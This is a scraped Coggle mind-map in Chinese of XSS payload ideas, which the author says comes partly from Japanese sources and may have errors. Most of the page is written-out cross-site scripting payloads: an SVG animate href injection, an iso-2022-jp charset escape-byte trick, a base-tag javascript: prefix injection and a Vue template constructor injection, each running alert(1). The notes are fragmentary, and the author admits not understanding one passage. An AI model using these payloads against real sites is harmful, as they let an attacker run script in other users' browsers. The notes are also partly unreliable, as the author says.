Please enable JavaScript.
Coggle requires JavaScript to display documents.
xss思路 (html5,部分来源日文资料,可能有差错 (<object allowscriptaccess=always>
<…
xss思路
html5,部分来源日文资料,可能有差错
-
SVG标签中value标签属性的应用(chrome中)<svg><animate href=#x attributeName=href values= javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
charset 编码中解析不了的字符串,常用%0b这种类似的
例子:<meta charset=iso-2022-jp><svg o[0x1B](Bnload=alert(1)><meta charset=iso-2022-jp><script>alert(1)[0x1B]$[0x0A]</script>
国内的编码也有类似的会自动剔除这种类似的字符,暂时想不起来了,想起来了再补充
base 标签的利用<div> <a href=/**/alert(1)>XSS</a><base href="javascript:\ </div><div id="x"></div>
其中payload为<a href=/**/alert(1)>XSS</a><base href="javascript:\ 目的是为href加前缀
用于相对url,限制了前缀的
利用条件,后方有空格,之后跟"' 跨站脚本任意编写,原文日文。理解无能
-
-
-
框架xss(来源日文资料,可能有差错
-
vue
条件,vue放在服务器上(目测是同源好像= =,任意xss,CDN相应页面CORS允许框架跨域加载好像是
chrome下<link rel=import href=/bypass/vue.html><div id=app>{{constructor.constructor('alert(1)')()}}
-
-
-
-
-